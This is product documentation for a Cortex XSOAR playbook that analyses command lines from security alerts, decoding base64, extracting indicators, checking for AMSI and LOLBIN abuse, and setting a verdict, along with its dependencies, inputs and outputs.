Command-Line Analysis
Common Playbooks Pack.#
This Playbook is part of theSupported versions
Supported Cortex XSOAR versions: 6.0.0 and later.
This playbook takes a command line from the alert and performs the following actions:
- Checks for base64 string and decodes if exists
- Extracts and enriches indicators from the command line
- Checks specific arguments for malicious usage
At the end of the playbook, it sets a possible verdict for the command line, based on the finding:
- Indicators found in the command line
- Found AMSI techniques
- Found suspicious parameters
- Usage of malicious tools
- Indication of network activity
- Indication of suspicious LOLBIN execution
Note: In case you are wishing to run this playbook with a list of command lines, set this playbook to be running in a loop. To do so, navigate to the 'Loop' and check "For Each Input".
#
DependenciesThis playbook uses the following sub-playbooks, integrations, and scripts.
#
Sub-playbooks- Compare Process Execution Arguments To LOLBAS Patterns
#
IntegrationsThis playbook does not use any integrations.
#
Scripts- DeleteContext
- Set
- Base64Decode
- MatchRegexV2
#
Commands- extractIndicators
#
Playbook InputsName | Description | Default Value | Required |
---|---|---|---|
Commandline | The command line. | Optional | |
StringSimilarityThreshold | StringSimilarity automation threshold. Used by the Compare "Process Execution Arguments To LOLBAS Patterns" sub-playbook. This input controls the StringSimilarity automation threshold. | 0.5 | Optional |
#
Playbook OutputsPath | Description | Type |
---|---|---|
MatchRegex | The regex found in the command line | unknown |
Indicators | Indicators extracted from the command line | unknown |
commandline.original | The original command line | unknown |
commandline.decoded | The decoded command line | unknown |
CommandlineVerdict | The command line verdict | unknown |
IP | The IP object. | unknown |
URL | The URL object. | uknown |
File | The file object. | unknown |
Domain | The domain object. | unknown |